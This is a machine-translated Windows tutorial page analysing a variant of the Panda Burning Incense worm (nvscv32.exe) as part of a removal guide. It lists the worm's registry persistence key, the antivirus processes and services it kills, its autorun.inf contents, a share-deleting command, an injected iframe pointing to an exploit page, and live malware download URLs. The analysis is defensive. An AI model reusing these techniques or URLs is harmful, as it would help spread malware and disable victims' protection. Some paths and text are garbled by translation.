Windows system >> Windows XP System Tutorial >> XP system basics

Panda burning incense virus nvscv32.exe variant manual removal program (4)

  

Five, technical analysis

1: After the virus file is running, copy itself to %SystemRoot%\\system32\\drivers\ vscv32.exe< Br>

Create a registry self-starting item:

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\]

nvscv32: "C:\\Windows\\system32\\drivers\\ Nvscv32.exe"

2: Find anti-virus form virus end related process:

  • Skynet Firewall
  • virusscan
  • symantec antivirus< Br>
  • system safety monitor
  • system repair engineer
  • wrapped gift killer
  • Game Trojan Tester
  • Super Patrol

    3: End the following process

    • mcshIEld.exe
    • vstskmgr.exe
    • naprdmgr.exe
    • updaterui.exe
    • tbmon.exe
    • scan32.exe
    • ravmond.exe
    • ccenter.exe
    • ravtask.exe
    • rav. Exe
    • Ravmon.exe
    • ravmond.exe
    • ravstub.exe
    • kvxp.kxp
    • kvmonxp.kxp
    • kvcenter.kxp
    • kvsrvxp.exe
    • kregex.exe
    • uihost.exe
    • trojdIE.kxp
    • frogagent.exe
    • kvxp .kxp
    • kvmonxp.kxp
    • kvcenter.kxp
    • kvsrvxp.exe
    • kregex.exe
    • uihost.exe
    • trojdIE.kxp
    • frogagent.exe
    • logo1_.exe
    • logo_1.exe
    • rundl132.exe
    • taskmgr. Exe
    • msconfig.exe
    • regedit.exe
    • sreng.exe

      4: Disable the following services

      • schedule
      • sharedAccess
      • rsccenter
      • rsravmon
      • rsccenter
      • kvwsc
      • kvsrvxp
      • Kvwsc
      • kvsrvxp
      • kavsvc
      • avp
      • avp
      • kavsvc
      • mcafeeframework
      • mcshIEld
      • mctaskmanager
      • mcafeeframework
      • mcshIEld
      • mctaskmanager
      • navapsvc
      • wscsvc
      • kpfwsvc< Br>
      • sndsrvc
      • ccproxy
      • ccevtmgr
      • ccsetmgr
      • spbbcsvc
      • symantec core lc
      • npfmntor
      • mskservice
      • firesvc

        5: Delete the following registry key:

        • software\\microsoft\\Windows\\currentversion\ un\\ Ravtask
        • software\\microsoft\\Windows\\currentversion\ un\\kvmonxp
        • software\\microsoft\\Windows\\currentversion\ un\\kav
        • software\\microsoft\\Windows\\currentversion\ un \\kavpersonal50
        • software\\microsoft\\Windows\\currentversion\ un\\mcafeeupdaterui
        • software\\microsoft\\Windows\\currentversion\ un\ etwork associates error reporting service
        • software\\microsoft\\ Windows\\currentversion\ un\\shstatexe
        • software\\microsoft\\Windows\\currentversion\ un \\ylive.exe
        • software\\microsoft\\Windows\\currentversion\ un\\yassistse

          6: Infect all executable files and change the icon to (this time it’s not the panda burning incense Icon)

          7: Skip the following directory:

          • Windows
          • winnt
          • systemvolumeinformation
          • recycled
          • Windowsnt
          • Windowsupdate
          • Windowsmediaplayer
          • outlookexpress
          • netmeeting
          • commonfiles
          • complusapplications
            < LI> commonfiles
          • messenger
          • installshIEldinstallationinformation
          • msn
          • microsoftFrontPage
          • movIEmaker
          • msngaminzone

            8: Delete the *.gho ​​backup file.

            9: Create a copy of the file. setup.exe in all the root directories of the drive, create an autorun.inf file to make the virus run automatically, and set the file attributes to hidden, read-only, and system.

            autorun.inf content:
            [AutoRun]
            OPEN=setup.exe
            shellexecute=setup.exe
            shell\\Auto\\command=setup.exe

            10: Delete share: cmd.exe /c net share admin$ /del /y

            11: Add <iframe src=http://www.krvkr.com/to all script files on the machine Worm.htm width=”0” height=”0”></iframe>, this code address is a web page trojan that exploits the MS-06014 vulnerability, once the user browses the web page on the server in the virus, if the system If you don't patch it, you will download and execute this virus.

            12: Scan LAN machines, and once they find a vulnerability, they will spread quickly.

            13: Visit http://www in the background. Whboy. Net/update/wormcn. Txt, download other viruses according to the download list.

            The current download list is as follows: (The following links are all dangerous content, please do not click!)

            • http://www.krvkr.com/down/cq.exe
            • http://www.krvkr.com/down/mh.exe
            • http://www.krvkr.com/down/my.exe
            • http://Www.krvkr.com/down/wl.exe
            • http://www.krvkr.com/down/rx.exe
            • http://www.krvkr.com/down/Wow.exe
            • http://www.krvkr.com/down/zt.exe
            • http://www.krvkr.com/down/wm.exe
            • http://www.krvkr.com/down/dj.exe
            • http://www.krvkr.com/cn/IEchajian.exe

              To this virus behavior The analysis is complete.

XP system basics
Windows system
Clever thinking, let the desktop accommodate more icons

        Many people like to put some shortcuts on the desktop for convenience. It is convenient to u
Network Address Translation (NAT) Overview in Win XP

Introduction As more and more homes and small businesses add computers, they will find the network

Teach you to do Windows XP login interface

First, find the logonui.exe file in your computer, usually in the c:\\Windows\\system32 directory, c
Dell pre-empts Win XP pre-installed

. Dell previously announced a $20-50 plan to downgrade from Windows Vista to XP. Now this plan may b
Let the activation of WindowsXP system do it once and for all

        Usually, after we reinstall Windows XP, we must re-activate the Internet or dial a dedicated
WindowsXP progress bar interface Graphical Windows read bar interface card or slow solution

        When entering the system, the windowsXP read bar interface is very slow, sometimes it will d
  • XP system application skills
  • XP system basics
  • Xp FAQ
  • About XP system tutorial

    • Apple mac system to install windows7 system detailed tutorial

    How to close the Win8 virus protection program?

    Partition Assistant Loss Partitioning Tutorial

    When will Win9 be released? Microsoft's next generation Win9 intelligence summary

    How does Win7 reduce CPU usage?

    Win8 system storm voice can not run the solution

    Microsoft improves the Win10 home features to make it safer for children to use the computer

    How does the XP system modify the folder icon?

    What if I can't receive Win10 push? Win7/8 did not receive the win10 upgrade prompt solution solution

    Let Vista system only recognize the U disk I specified

  • Windows XP System Tutorial
  • Windows 7 System Tutorial
  • Windows 8 System Tutorial
  • Windows 10 System Tutorial
  • Windows 2003 System Tutorial
  • Windows 2008 System Tutorial
  • Windows Vista System Tutorial
  • Windows tutorial synthesis
  • Windows Server System Tutorial
  • Linux system Tutorial
  • Computer software Tutorial
  • Windows NT Tutorial
    • Copyright © Windows knowledge All Rights Reserved